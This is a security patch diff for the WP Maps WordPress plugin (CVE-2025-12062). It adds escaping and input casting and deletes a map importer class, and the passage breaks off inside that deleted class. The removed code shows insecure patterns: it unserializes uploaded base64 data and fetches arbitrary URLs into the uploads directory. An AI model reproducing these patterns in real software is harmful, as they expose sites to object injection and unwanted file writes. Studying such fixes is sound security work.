CVE-2025-12062: WP Maps <= 4.8.6 – Authenticated (Subscriber+) Limited Local File Inclusion (wp-google-map-plugin)

--- a/wp-google-map-plugin/classes/wpgmp-check-cookies.php
+++ b/wp-google-map-plugin/classes/wpgmp-check-cookies.php
@@ -1,7 +1,7 @@
 <?php
 add_filter('wpgmp_accept_cookies','wpgmp_accept_cookies_consent');

-function check_cookieyes_consent() {
+function wpgmp_check_cookieyes_consent() {
     if (isset($_COOKIE['cookieyes-consent'])) {
         $cookie_value = $_COOKIE['cookieyes-consent'];
         $cookie_data = urldecode($cookie_value);
@@ -25,7 +25,7 @@
 		$is_allowed = true;
 	} elseif (function_exists('gdpr_cookie_is_accepted') && gdpr_cookie_is_accepted('thirdparty')) {
 		$is_allowed = true;
-	} elseif (function_exists('cky_get_consent_db_version') && check_cookieyes_consent()) {
+	} elseif (function_exists('cky_get_consent_db_version') && wpgmp_check_cookieyes_consent()) {
 		$is_allowed = true;
 	} elseif (class_exists('iubendaParser') && iubendaParser::consent_given()) {
 		$is_allowed = true;
@@ -46,7 +46,7 @@
 		$accepted = false;
 	} elseif (function_exists('gdpr_cookie_is_accepted') && !gdpr_cookie_is_accepted('thirdparty')) {
 		$accepted = false;
-	} elseif (function_exists('cky_get_consent_db_version') && !check_cookieyes_consent()) {
+	} elseif (function_exists('cky_get_consent_db_version') && !wpgmp_check_cookieyes_consent()) {
 		$accepted = false;
 	} elseif (class_exists('iubendaParser') && !iubendaParser::consent_given()) {
 		$accepted = false;
--- a/wp-google-map-plugin/classes/wpgmp-feedback-form.php
+++ b/wp-google-map-plugin/classes/wpgmp-feedback-form.php
@@ -4,27 +4,37 @@
  * Displays the content of the dialog box when the user clicks on the "Deactivate" link on the plugin settings page
  */

-function wpgmp_add_feedback_form()
-{
-    $contact_support_template = __('Need help? We are ready to answer your questions. <a href="https://weplugins.com/support/" target="_blank">Contact Support</a>');
+function wpgmp_add_feedback_form(){
+
+    $link_text = __( 'Contact Support', 'wp-google-map-plugin' );
+
+
+    $contact_support_template = sprintf(
+        /* translators: %s: The "Contact Support" link HTML. */
+        __( 'Need help? We are ready to answer your questions. %s', 'wp-google-map-plugin' ),
+        sprintf(
+            '<a href="https://weplugins.com/support/" target="_blank">%s</a>',
+            $link_text
+        )
+    );

     $reasons = array(
         array(
             'id'                => 'NOT_WORKING',
-            'text'              => __('The plugin is not working'),
+            'text'              => __('The plugin is not working','wp-google-map-plugin'),
             'input_type'        => 'textarea',
-            'input_placeholder' => esc_attr__("Kindly share what didn't work so we can fix it in future updates."),
+            'input_placeholder' => esc_attr__("Kindly share what didn't work so we can fix it in future updates.",'wp-google-map-plugin'),
         ),
         array(
             'id'                => 'SUDDENLY_STOPPED_WORKING',
-            'text'              => __('The plugin suddenly stopped working'),
+            'text'              => __('The plugin suddenly stopped working','wp-google-map-plugin'),
             'input_type'        => '',
             'input_placeholder' => '',
             'internal_message'  => $contact_support_template,
         ),
         array(
             'id'                => 'BROKE_MY_SITE',
-            'text'              => __('The plugin broke my site'),
+            'text'              => __('The plugin broke my site','wp-google-map-plugin'),
             'input_type'        => '',
             'input_placeholder' => '',
             'internal_message'  => $contact_support_template,
@@ -32,32 +42,32 @@
         ),
         array(
             'id'                => 'COULDNT_MAKE_IT_WORK',
-            'text'              => __("I couldn't understand how to get it work"),
+            'text'              => __("I couldn't understand how to get it work",'wp-google-map-plugin'),
             'input_type'        => '',
             'input_placeholder' => '',
             'internal_message'  => $contact_support_template,
         ),
         array(
             'id'                => 'FOUND_A_BETTER_PLUGIN',
-            'text'              => __('I found a better plugin'),
+            'text'              => __('I found a better plugin','wp-google-map-plugin'),
             'input_type'        => 'textarea',
-            'input_placeholder' => esc_attr__('Can you please name the plugin and why you liked that it more?'),
+            'input_placeholder' => esc_attr__('Can you please name the plugin and why you liked that it more?','wp-google-map-plugin'),
         ),
         array(
             'id'                => 'GREAT_BUT_NEED_SPECIFIC_FEATURE',
-            'text'              => __('The plugin is great, but I need a specific feature'),
+            'text'              => __('The plugin is great, but I need a specific feature','wp-google-map-plugin'),
             'input_type'        => 'textarea',
-            'input_placeholder' =>  esc_attr__('Can you share more details on the missing feature?'),
+            'input_placeholder' =>  esc_attr__('Can you share more details on the missing feature?','wp-google-map-plugin'),
         ),
         array(
             'id'                => 'TEMPORARY_DEACTIVATION',
-            'text'              => __("It's a temporary deactivation, I'm just debugging an issue"),
+            'text'              => __("It's a temporary deactivation, I'm just debugging an issue",'wp-google-map-plugin'),
             'input_type'        => '',
             'input_placeholder' => '',
         ),
         array(
             'id'                => 'OTHER',
-            'text'              => __('Other'),
+            'text'              => __('Other','wp-google-map-plugin'),
             'input_type'        => 'textarea',
             'input_placeholder' => '',
         ),
@@ -110,6 +120,10 @@

     $plugin_name = 'wp-google-map-plugin';
     $basename = 'wp-google-map-plugin';
+    $processing = esc_html__('Processing...','wp-google-map-plugin');
+    $submit_deactivate = esc_html__('Submit and Deactivate','wp-google-map-plugin');
+    $skip_deactivate = esc_html__('Skip and Deactivate','wp-google-map-plugin');
+    $improve_it = esc_html__('Please tell us the reason so we can improve it.','wp-google-map-plugin');

     $script .= '(function($) {
             var modalHtml = ' . json_encode($modal_html) . ",
@@ -200,7 +214,7 @@
                             beforeSend: function() {
                             	$('.fc-backend-loader').show(); // Show the loader
                                 _parent.find( '.wpgmp-modal-footer .button' ).addClass( 'disabled' );
-                                _parent.find( '.wpgmp-modal-footer .button-secondary' ).text( '" . __('Processing') . "' + '...' );
+                                _parent.find( '.wpgmp-modal-footer .button-secondary' ).text( '" . $processing . "' + '...' );
                             },
                             complete  : function( message ) {
                                 /* Do not show the dialog box, deactivate the plugin. */
@@ -229,7 +243,7 @@

                     $modal.find( '.wpgmp-modal-reason-input' ).remove();
                     $modal.find( '.wpgmp-modal-internal-message' ).hide();
-                    $modal.find( '.wpgmp-modal-button-deactivate' ).text( '" . __('Submit and Deactivate') . "' );
+                    $modal.find( '.wpgmp-modal-button-deactivate' ).text( '" . $submit_deactivate . "' );

                     wpgmpModalEnableDeactivateButton();

@@ -244,7 +258,7 @@
                         _parent.find( 'input, textarea' ).attr( 'placeholder', _parent.data( 'input-placeholder' ) ).focus();

                         if ( wpgmpModalIsReasonSelected( 'OTHER' ) ) {
-                            $modal.find( '.message' ).text( '" . __('Please tell us the reason so we can improve it.') . "' ).show();
+                            $modal.find( '.message' ).text( '" . $improve_it . "' ).show();
                         }
                     }
                 });
@@ -309,7 +323,7 @@
             function wpgmpModalShowPanel() {
                 $modal.find( '.wpgmp-modal-panel' ).addClass( 'active' );
                 /* Update the deactivate button's text */
-                $modal.find( '.wpgmp-modal-button-deactivate' ).text( '" . __('Skip and Deactivate') . "' );
+                $modal.find( '.wpgmp-modal-button-deactivate' ).text( '" . $skip_deactivate . "' );
             }
         })(jQuery);";
     wp_register_script('wpgmp-deactivation-form', '', array('jquery'), false, true);
--- a/wp-google-map-plugin/classes/wpgmp-helper.php
+++ b/wp-google-map-plugin/classes/wpgmp-helper.php
@@ -182,6 +182,7 @@
 		}

 		$localized = [
+			'pro_version_feature'       =>  __( 'This feature requires the Pro version of the plugin.', 'wp-google-map-plugin' ),
 			'ajax_url'                  => admin_url( 'admin-ajax.php' ),
 			'nonce'                     => wp_create_nonce( 'fc-call-nonce' ),
 			'copy_icon'                 => WPGMP_IMAGES . 'copy-to-clipboard.png',
@@ -484,7 +485,7 @@

 	public static function wpgmp_features_limits_msg() {

-		return esc_html__('You're using Leaflet. Google Maps–only features have been greyed out.','wp-google-maps');
+		return esc_html__('You're using Leaflet. Google Maps–only features have been greyed out.','wp-google-map-plugin');

 	}

--- a/wp-google-map-plugin/classes/wpgmp-integration-form.php
+++ b/wp-google-map-plugin/classes/wpgmp-integration-form.php
@@ -1,12 +1,19 @@
 <?php
+/**
+ * File: WPGMP_Integration_Form.php
+ * Security: All FlipperCode_HTML_Markup methods return pre-escaped HTML
+ */
+// phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped

 if ( ! class_exists( 'WPGMP_Integration_Form' ) ) {

 class WPGMP_Integration_Form {
+
 	private $fields = [];
 	private $extension_key = '';

 	public function __construct($extension_key, $fields = []) {
+
 		$this->extension_key = sanitize_key($extension_key);
 		$this->fields = $fields;
 	}
@@ -30,6 +37,7 @@
 	}

 	private function render_field($field) {
+
 		$name  = esc_attr($field['name']);
 		$label = esc_html($field['label'] ?? '');
 		$type  = $field['type'];
@@ -110,4 +118,6 @@

 }

-}
 No newline at end of file
+}
+
+// phpcs:enable WordPress.Security.EscapeOutput.OutputNotEscaped
--- a/wp-google-map-plugin/classes/wpgmp-map-widget.php
+++ b/wp-google-map-plugin/classes/wpgmp-map-widget.php
@@ -35,19 +35,33 @@
 		 */
 		function widget( $args, $instance ) {

-			global $wpdb,$map;
-			extract( $args );
-
+			global $wpdb, $map;
+
+			// Don't use extract() - access array elements directly
+			$before_widget = $args['before_widget'] ?? '';
+			$after_widget = $args['after_widget'] ?? '';
+			$before_title = $args['before_title'] ?? '';
+			$after_title = $args['after_title'] ?? '';
+
+			// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
 			$map_id    = apply_filters( 'widget_title', empty( $instance['map_id'] ) ? '' : $instance['map_id'], $instance, $this->id_base );
 			$map_title = apply_filters( 'widget_text', empty( $instance['map_title'] ) ? '' : $instance['map_title'], $instance );
+			// phpcs:enable WordPress.NamingConventions.PrefixAllGlobals

-			echo $before_widget;
+			// Escape all widget output
+			echo wp_kses_post( $before_widget );
+
 			if ( ! empty( $map_title ) ) {
-				echo $before_title . esc_html( $map_title ) . $after_title; }
+				echo wp_kses_post( $before_title ) . esc_html( $map_title ) . wp_kses_post( $after_title );
+			}

 			if ( ! empty( $map_id ) ) {
-				echo do_shortcode( '[put_wpgm id=' . $map_id . ']' ); }
-			echo $after_widget;
+				// do_shortcode is safe, but ensure map_id is numeric
+				$safe_map_id = absint( $map_id );
+				echo do_shortcode( '[put_wpgm id=' . $safe_map_id . ']' );
+			}
+
+			echo wp_kses_post( $after_widget );
 		}
 		/**
 		 * Update widget options.
@@ -59,8 +73,8 @@
 		function update( $new_instance, $old_instance ) {

 			$instance              = $old_instance;
-			$instance['map_title'] = strip_tags( $new_instance['map_title'] );
-			$instance['map_id']    = strip_tags( $new_instance['map_id'] );
+			$instance['map_title'] = wp_strip_all_tags( $new_instance['map_title'] );
+			$instance['map_id']    = wp_strip_all_tags( $new_instance['map_id'] );
 			return $instance;
 		}
 		/**
@@ -71,7 +85,7 @@
 		function form( $instance ) {

 			global $wpdb,$map;
-			$map_records = $wpdb->get_results( 'SELECT map_id,map_title FROM ' . TBL_MAP . '' );
+			$map_records = $wpdb->get_results( 'SELECT map_id,map_title FROM ' . TBL_MAP . '' );// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared

 			if ( ! isset( $instance['map_title'] ) ) {
 				$instance['map_title'] = '';
@@ -85,19 +99,19 @@
 				<label for="<?php echo esc_html( $this->get_field_id( 'map_title' ) ); ?>">
 					<?php esc_html_e( 'Title:', 'wp-google-map-plugin' ); ?>
 				</label>
-				<input type="text" value="<?php echo $instance['map_title']; ?>" name="<?php echo esc_html( $this->get_field_name( 'map_title' ) ); ?>" class="widefat" style="margin-top:6px;">
+				<input type="text" value="<?php echo esc_html($instance['map_title']); ?>" name="<?php echo esc_html( $this->get_field_name( 'map_title' ) ); ?>" class="widefat" style="margin-top:6px;">
 			</p>
 			<p>
-				<label for="<?php echo $this->get_field_id( 'map_id' ); ?>">
+				<label for="<?php echo esc_html($this->get_field_id( 'map_id' )); ?>">
 					<?php esc_html_e( 'Select Your Map:', 'wp-google-map-plugin' ); ?>
 				</label>
-				<select id="<?php echo $this->get_field_id( 'map_id' ); ?>" name="<?php echo esc_attr( $this->get_field_name( 'map_id' ) ); ?>" class="widefat" style="margin-top:6px;">
+				<select id="<?php echo esc_html($this->get_field_id( 'map_id' )); ?>" name="<?php echo esc_attr( $this->get_field_name( 'map_id' ) ); ?>" class="widefat" style="margin-top:6px;">
 				<option value=""><?php esc_html_e( 'Select map', 'wp-google-map-plugin' ); ?></option>
 				<?php
 				if ( ! empty( $map_records ) ) {
 					foreach ( $map_records as $key => $map_record ) {
 						?>
-						<option value="<?php echo $map_record->map_id; ?>"<?php selected( $map_record->map_id, $instance['map_id'] ); ?>><?php echo esc_html( $map_record->map_title ); ?></option>
+						<option value="<?php echo esc_html($map_record->map_id); ?>"<?php selected( $map_record->map_id, $instance['map_id'] ); ?>><?php echo esc_html( $map_record->map_title ); ?></option>
 						<?php
 					}
 				}
--- a/wp-google-map-plugin/classes/wpgmp-maps-importer.php
+++ b/wp-google-map-plugin/classes/wpgmp-maps-importer.php
@@ -1,629 +0,0 @@
-<?php
-
-if ( ! defined( 'ABSPATH' ) ) {
-	die( 'You are not allowed to call this page directly.' );
-}
-
-if ( ! class_exists( 'WPGMP_Maps_Importer' ) ) {
-
-	class WPGMP_Maps_Importer {
-
-		/*
-		* Class Vars
-		*
-		*/
-		private $wpgmp_data = array();
-		private $wpgmp_settings = '';
-		private $allow_url_fopen = false;
-		private $curl = false;
-		private $notification = '';
-		private $response = array();
-		private $group_map_data;
-		private $location_data;
-		private $map_data;
-		private $routes_data;
-		private $settings;
-		private $location_extrafields;
-		private $wpgmp_widget_settings;
-		private $extra_data;
-		private $source_website;
-		private $is_source_multisite;
-		private $source_site_id;
-		private $mapping_data = array();
-		private $files_to_migrate;
-		private $proceed = false;
-		private $googlemapsMissing;
-		private $migratedImages = 0;
-		private $current_operation = '';
-
-		public function __construct() {
-
-
-			$this->wpgmp_settings = maybe_unserialize( get_option( 'wpgmp_settings' ) );
-
-			if( is_admin() ){
-				add_action( 'admin_menu', array($this,'wpgmm_migrate_map_settings'),100);
-				add_action( 'admin_init', array($this,'wpgmm_handle_migration'),100);
-				add_action( 'admin_footer', array($this,'wpgmm_handle_custom'),100);
-				add_action( 'admin_head', array($this,'wpgmm_action_head'));
-
-			}
-
-		}
-
-
-		function wpgmm_check_security_authentication(){
-
-			//Permission Authentication
-            if ( ! current_user_can( 'manage_options' ) ) {
-                 die( 'You are not allowed to make changes' );
-            }
-
-			//Nonce Verification
-			if ( !isset( $_REQUEST['_wpnonce'] ) ) {
-				 die( 'You are not allowed to make changes' );
-			}
-			$nonce = sanitize_text_field( wp_unslash( $_REQUEST['_wpnonce'] ) );
-			if ( !empty( $nonce ) &&  ! wp_verify_nonce( $nonce, 'wpgmp-nonce' ) ) {
-				 die( 'You are not allowed to make changes' );
-			}
-
-		}
-
-
-		function wpgmm_handle_migration(){
-
-			$this->wpgmp_settings = maybe_unserialize( get_option( 'wpgmp_settings' ) );
-			if( !empty( ini_get('allow_url_fopen') ) && ini_get('allow_url_fopen') == '1') {
-				$this->allow_url_fopen  = true;
-			}else if( in_array ('curl', get_loaded_extensions()) ){
-				$this->curl  = true;
-			}
-
-
-			if( isset($_POST['wpgmp_do_images_migration']) && !empty($_POST['wpgmp_do_images_migration']) ) {
-
-					$this->wpgmm_check_security_authentication();
-					$this->files_to_migrate = maybe_unserialize( get_option('wpgmm_location_images') );
-					$this->wpgmm_migrate_images();
-					if( $this->migratedImages == '0' ){
-
-						$this->response['success'] = esc_html__( 'All images are already present now in wordpress uploads. Please refresh maps page and cross check images. Migration process of images is complete.', 'wp-google-map-plugin' );
-
-					}else{
-						$this->response['success'] = sprintf( __( 'Missing %s image(s) has been imported successfully.', 'wp-google-map-plugin' ), $this->migratedImages );
-					}
-					return;
-
-			}
-
-			if(isset($_POST['wpgmp_do_map_migration']) && !empty($_POST['wpgmp_do_map_migration'])) {
-
-				$this->wpgmm_check_security_authentication();
-				$proceed = true;
-
-				if(empty($_FILES['wpgmp_map_import_control']['tmp_name'])){
-					$this->response['error'] = esc_html__( 'Please upload the original backup .txt file that was exported from the target site as backup.', 'wp-google-map-plugin' );
-					$proceed = false;
-				}
-				$allowed = array('txt');
-				$filename = $_FILES['wpgmp_map_import_control']['name'];
-				$ext = pathinfo($filename, PATHINFO_EXTENSION);
-				if ( !empty($_FILES['wpgmp_map_import_control']['tmp_name']) && !in_array($ext, $allowed) ) {
-					$this->response['error'] = esc_html__( 'The uploaded file is not valid .txt file that was exported and downloaded as map code file. Please upload the downloaded .txt file only that contains the map code.', 'wp-google-map-plugin' );
-					$proceed = false;
-				}
-
-				if(!$proceed)
-				return;
-
-				$this->response['success'] = esc_html__( 'Map was successfully imported on your website. Please navigate to Manage Maps screen.', 'wp-google-map-plugin' );
-
-				$decrypted_data = maybe_unserialize( base64_decode( file_get_contents($_FILES['wpgmp_map_import_control']['tmp_name']) ) );
-
-
-				$this->location_data = $decrypted_data['location'];
-				$this->group_map_data = $decrypted_data['group_map'];
-				$this->routes_data = $decrypted_data['route'];
-				$this->map_data = $decrypted_data['map'];
-				$this->settings = $decrypted_data['settings'];
-				$this->location_extrafields = $decrypted_data['location_extrafields'];
-				$this->wpgmp_widget_settings = $decrypted_data['wpgmp_widget_settings'];
-				$this->extra_data = ( isset($decrypted_data['extra_data']) && !empty($decrypted_data['extra_data']) ) ? $decrypted_data['extra_data'] : '';
-				$this->source_website = (isset($decrypted_data['source_website'])) ? $decrypted_data['source_website'] : '';
-				$this->is_source_multisite = (isset($decrypted_data['is_multisite'])) ? $decrypted_data['is_multisite'] : '';
-				$this->source_site_id = (isset($decrypted_data['source_site_id'])) ? $decrypted_data['source_site_id'] : '';
-
-				if(!empty($location_data) && !is_array($location_data)){
-				   $this->location_data  = maybe_unserialize( base64_decode( $location_data ) );
-				}
-				if(!empty($group_map_data) && !is_array($group_map_data)){
-				   $this->group_map_data  = maybe_unserialize( base64_decode( $group_map_data ) );
-				}
-				if(!empty($routes_data) && !is_array($routes_data)){
-				   $this->routes_data  = maybe_unserialize( base64_decode( $routes_data ) );
-				}
-				if(!empty($map_data) && !is_array($map_data)){
-				   $this->map_data  = maybe_unserialize( base64_decode( $map_data ) );
-				}
-				if(!empty($settings) && !is_array($settings)){
-				   $this->settings  = maybe_unserialize( base64_decode( $settings ) );
-				}
-				if(!empty($location_extrafields) && !is_array($location_extrafields)){
-				   $this->location_extrafields  = maybe_unserialize( base64_decode( $location_extrafields ) );
-				}
-				if(!empty($wpgmp_widget_settings) && !is_array($wpgmp_widget_settings)){
-				   $this->wpgmp_widget_settings  = maybe_unserialize( base64_decode( $wpgmp_widget_settings ) );
-				}
-				if(!empty($extra_data) && !is_array($extra_data)){
-				   $this->extra_data  = maybe_unserialize( base64_decode( $extra_data ) );
-				}
-				if(!empty($source_website) && !is_array($source_website)){
-				   $this->source_website  = maybe_unserialize( base64_decode( $source_website ) );
-				}
-
-				$this->wpgmm_migrate_settings();
-				$this->wpgmm_migrate_group_maps();
-				$this->wpgmm_migrate_locations();
-				$this->wpgmm_migrate_routes();
-				$this->wpgmm_migrate_maps();
-				$this->wpgmm_migrate_images();
-
-			}
-
-		}
-
-		function wpgmm_migrate_settings(){
-
-			//Migrate Settings
-			if( class_exists( 'WPGMP_Model_Settings' ) ){
-
-				$settingsObj = new WPGMP_Model_Settings();
-				if(!empty($settingsObj)) {
-
-					$settings = (array)$this->wpgmp_settings;
-					$settings['location_extrafields'] = maybe_unserialize($this->location_extrafields);
-					$settings['_wpnonce'] = $_POST['_wpnonce'];
-					$_POST = $settings;
-					$settingsObj->save();
-					update_option( 'widget_wpgmp_google_map_widget_class', maybe_unserialize($this->wpgmp_widget_settings) );
-
-				}
-
-			}
-
-		}
-
-		function wpgmm_migrate_group_maps(){
-
-			global $wpdb;
-
-			//Migrate Categories
-			if( class_exists( 'WPGMP_Model_Group_Map' ) ){
-
-				$categoryObj = new WPGMP_Model_Group_Map();
-				if(!empty($this->group_map_data)) {
-					foreach($this->group_map_data as $category){
-
-						$category = (array)$category;
-						$category['extensions_fields'] = maybe_unserialize($category['extensions_fields']);
-						$category['group_marker'] = str_replace( $this->extra_data['source_website'] , home_url(), $category['group_marker']);
-						$category['_wpnonce'] = $_POST['_wpnonce'];
-						$_POST = $category;
-						$response = $categoryObj->save();
-						$this->mapping_data['old_and_new_group'][$category['group_map_id']] = $response['last_db_id'];
-
-					}
-
-					//Map the parent categories also once new categories are created. Parent category mapping should be done like source site.
-					foreach($this->group_map_data as $category){
-
-						$category = (array)$category;
-
-						if($category['group_parent'] == 0)
-						continue;
-
-						$old_cat_to_be_updated = $category['group_parent'];
-						$new_cat_to_be_updated = @$this->mapping_data['old_and_new_group'][$old_cat_to_be_updated];
-						$oldkey = array_search($this->mapping_data['old_and_new_group'][$category['group_map_id']], $this->mapping_data['old_and_new_group']);
-
-						$wpdb->update(
-						    $wpdb->prefix .'group_map',
-						    array(
-						        'group_parent' => $new_cat_to_be_updated
-						    ),
-						    array(
-						        'group_map_id' => $this->mapping_data['old_and_new_group'][$oldkey]
-						    )
-						);
-
-					}
-				}
-
-			}
-
-		}
-
-		function wpgmm_migrate_locations(){
-
-			//Migrate Locations
-			if( class_exists( 'WPGMP_Model_Location' ) ){
-
-				$locationObj = new WPGMP_Model_Location();
-				if(!empty($this->location_data)) {
-
-					if(!is_multisite() && !$this->is_source_multisite){
-
-						$home_url_to_replace = home_url();
-						$source_url_to_replace = $this->extra_data['source_website'];
-
-					}else if(is_multisite() && !$this->is_source_multisite) {
-
-						$home_url_to_replace = home_url().'/wp-content/uploads/sites/'.get_current_blog_id();
-						$source_url_to_replace = $this->extra_data['source_website'].'/wp-content/uploads';
-
-					}else if(!is_multisite() && $this->is_source_multisite){
-
-						$home_url_to_replace = home_url().'/wp-content/uploads';
-						$source_url_to_replace = $this->extra_data['source_website'].'/wp-content/uploads/sites/'.$this->source_site_id;
-
-					}else if(is_multisite() && $this->is_source_multisite){
-
-						$home_url_to_replace = home_url().'/wp-content/uploads/sites/'.get_current_blog_id();
-						$source_url_to_replace = $this->extra_data['source_website'].'/wp-content/uploads/sites/'.$this->source_site_id;
-
-					}
-
-					foreach($this->location_data as $location){
-
-						$location = (array)$location;
-						$location['location_settings'] = maybe_unserialize($location['location_settings']);
-						$location['location_group_map'] = maybe_unserialize($location['location_group_map']);
-						$location['location_extrafields'] = maybe_unserialize($location['location_extrafields']);
-						$this->files_to_migrate[] = $location['location_settings']['featured_image'];
-
-						if(!empty($location['location_settings']['featured_image'])) {
-
-							if ( strpos($location['location_settings']['featured_image'], $this->extra_data['source_website']  ) !== false ) {
-
-								$location['location_settings']['featured_image'] = str_replace( $source_url_to_replace , $home_url_to_replace, $location['location_settings']['featured_image']);
-
-							}else{
-
-								if ( strpos( $location['location_settings']['featured_image'], 'https' ) === false && strpos( $this->extra_data['source_website'], 'https' ) !== false ) {
-
-									$location['location_settings']['featured_image'] = str_replace( 'http','https',$location['location_settings']['featured_image']);
-									$location['location_settings']['featured_image'] = str_replace( $source_url_to_replace , $home_url_to_replace ,$location['location_settings']['featured_image']);
-
-								}
-
-							}
-
-						}
-
-						$new_group_map_ids = array();
-						foreach($location['location_group_map'] as $old_id){
-							$new_group_map_ids[] = $this->mapping_data['old_and_new_group'][$old_id];
-						}
-						$location['location_group_map'] = $new_group_map_ids;
-						$location['_wpnonce'] = $_POST['_wpnonce'];
-						$_POST = $location;
-						$response = $locationObj->save();
-						$this->mapping_data['old_and_new_location'][$location['location_id']] = $response['last_db_id'];
-
-					}
-				}
-
-			}
-
-			update_option('wpgmm_location_images',$this->files_to_migrate);
-
-		}
-
-		function wpgmm_migrate_routes(){
-
-			//Migrate Routes
-			if( class_exists( 'WPGMP_Model_Route' ) ){
-
-				$routeObj = new WPGMP_Model_Route();
-
-				if(!empty($this->routes_data)) {
-					foreach($this->routes_data as $route){
-
-						$route = (array)$route;
-						$route['route_way_points'] = maybe_unserialize($route['route_way_points']);
-						$route['route_way_points'] = implode(',',$route['route_way_points']);
-						$route['_wpnonce'] = $_POST['_wpnonce'];
-						if(!empty($route['route_start_location'])){
-							$route['route_start_location'] = $this->mapping_data['old_and_new_location'][$route['route_start_location']];
-						}
-						if(!empty($route['route_end_location'])) {
-							$route['route_end_location'] = $this->mapping_data['old_and_new_location'][$route['route_end_location']];
-						}
-
-						if(!empty($route['route_way_points'])) {
-
-							$new_assigned_locations = array();
-							$route['route_way_points'] = explode(',',$route['route_way_points']);
-							foreach($route['route_way_points'] as $old_id){
-								$new_assigned_locations[] = $this->mapping_data['old_and_new_location'][$old_id];
-							}
-							$route['route_way_points'] = implode(',',$new_assigned_locations);
-
-						}
-						$_POST = $route;
-						$response = $routeObj->save();
-						$this->mapping_data['old_and_new_routes'][$route['route_id']] = $response['last_db_id'];
-
-					}
-				}
-
-			}
-
-
-		}
-
-		function wpgmm_migrate_maps(){
-
-			//Migrate Maps
-			if( class_exists( 'WPGMP_Model_Map' ) ){
-
-				$mapObj = new WPGMP_Model_Map();
-
-				if(!empty($this->map_data)) {
-
-					$map = 	$this->map_data;
-					$map = (array)$map;
-					$map['map_street_view_setting'] = maybe_unserialize($map['map_street_view_setting']);
-					$map['map_route_direction_setting'] = maybe_unserialize($map['map_route_direction_setting']);
-					$map['map_all_control'] = maybe_unserialize($map['map_all_control']);
-					$map['style_google_map'] = maybe_unserialize($map['style_google_map']);
-					$map['map_locations'] = maybe_unserialize($map['map_locations']);
-					$map['map_layer_setting'] = maybe_unserialize($map['map_layer_setting']);
-					$map['map_cluster_setting'] = maybe_unserialize($map['map_cluster_setting']);
-					$map['map_overlay_setting'] = maybe_unserialize($map['map_overlay_setting']);
-					$map['map_geotags'] = maybe_unserialize($map['map_geotags']);
-					$map['_wpnonce'] = $_POST['_wpnonce'];
-
-					$new_map_locations = array();
-					if(!empty($map['map_locations'])){
-						foreach($map['map_locations'] as $old_map_id){
-							$new_map_locations[] = $this->mapping_data['old_and_new_location'][$old_map_id];
-						}
-						$map['map_locations'] = $new_map_locations;
-					}
-
-					$new_map_routes = array();
-					if(!empty($map['map_route_direction_setting']['specific_routes'])) {
-						foreach($map['map_route_direction_setting']['specific_routes'] as $old_id){
-							$new_map_routes[] = $this->mapping_data['old_and_new_routes'][$old_id];
-						}
-					}
-					$map['map_route_direction_setting']['specific_routes'] = $new_map_routes;
-					$_POST = $map;
-					$mapObj->save();
-
-
-				}
-
-			}
-
-		}
-
-		function wpgmm_migrate_images(){
-
-			//Migrate Images
-			$uploads = wp_upload_dir();
-			if( $this->allow_url_fopen ) {
-
-				$this->files_to_migrate = array_filter($this->files_to_migrate);
-
-				if(isset($this->files_to_migrate) && !empty($this->files_to_migrate)) {
-					foreach($this->files_to_migrate as $url){
-
-						$imageinfo = explode('/',$url);
-						$month = $imageinfo[count($imageinfo)-2];
-						$year = $imageinfo[count($imageinfo)-3];
-						$upload_path = $uploads['basedir'].'/'.$year.'/'.$month.'/'.end($imageinfo);
-
-						if( !is_dir($uploads['basedir'].'/'.$year.'/'.$month) )   {
-							wp_mkdir_p( $uploads['basedir'].'/'.$year.'/'.$month );
-						}
-						if( is_dir($uploads['basedir'].'/'.$year.'/'.$month) ){
-
-							if ( file_exists( $uploads['basedir'].'/'.$year.'/'.$month.'/'.basename($url) ) ) {
-								continue;
-							}else{
-
-								$file_content = file_get_contents($url);
-								file_put_contents( $upload_path, $file_content );
-								$this->migratedImages++;
-
-							}
-
-						}
-
-					}
-				}
-			}
-		}
-
-		function wpgmm_get_complete_data(){
-
-			$wpgmp_settings = get_option( 'wpgmp_settings', true );
-			$wpgmp_location_extrafields = get_option( 'wpgmp_location_extrafields', true );
-			$wpgmp_widget_settings = get_option( 'widget_wpgmp_google_map_widget_class', true );
-			$modelFactory = new WPGMP_Model();
-
-			$location_obj = $modelFactory->create_object( 'location' );
-			$all_location_data = $location_obj->fetch();
-			if(!empty($all_location_data)) {
-				$this->wpgmp_data['location'] = $all_location_data;
-			}
-
-			$category_obj = $modelFactory->create_object( 'group_map' );
-			$categories   = $category_obj->fetch();
-			if(!empty($categories)) {
-				$this->wpgmp_data['group_map'] = $categories;
-			}
-
-			$route_obj = $modelFactory->create_object( 'route' );
-			$routes   = $route_obj->fetch();
-			if(!empty($routes)) {
-				$this->wpgmp_data['route'] = $routes;
-			}
-
-			$map_obj = $modelFactory->create_object( 'map' );
-			$maps   = $map_obj->fetch();
-			if(!empty($maps)) {
-				$this->wpgmp_data['map'] = $maps;
-			}
-
-			if(!empty($wpgmp_settings)) {
-				$this->wpgmp_data['settings'] = maybe_unserialize($wpgmp_settings);
-			}
-
-			if(!empty($wpgmp_location_extrafields)) {
-				$this->wpgmp_data['location_extrafields'] = maybe_unserialize($wpgmp_location_extrafields);
-			}
-
-			if(!empty($wpgmp_widget_settings)) {
-				$this->wpgmp_data['wpgmp_widget_settings'] = maybe_unserialize($wpgmp_widget_settings);
-			}
-
-			if(!empty($this->wpgmp_data)) {
-				$this->wpgmp_data['extra_data']['source_website'] = home_url();
-			}
-
-			if(is_multisite()){
-				$this->wpgmp_data['is_multisite'] = true;
-				$this->wpgmp_data['source_site_id'] = get_current_blog_id();
-			}
-
-			if(!empty($this->wpgmp_data))
-			$this->wpgmp_data = base64_encode( serialize( $this->wpgmp_data ) );
-			else
-			$this->wpgmp_data = '';
-
-		}
-
-		function wpgmm_settings_page() {
-
-			global $wpdb;
-			$modelFactory = new WPGMP_Model();
-			$mapobj       = $modelFactory->create_object( 'map' );
-			$map_records  = $mapobj->fetch();
-
-			//Permission Authentication
-			if ( ! current_user_can( 'manage_options' ) ) {
-				die( 'You are not allowed to make changes' );
-			}
-
-			$form = new WPGMP_Template();
-
-			$form->set_header( esc_html__( 'Import Maps Easily', 'wp-google-map-plugin' ), $this->response, $accordion = true );
-
-			$form->add_element(
-                'group', 'migration_settings', array(
-                'value'  => esc_html__( 'Import Live Demos', 'wp-google-map-plugin' ),
-                'before' => '<div class="fc-12">',
-                'after' => '</div>',
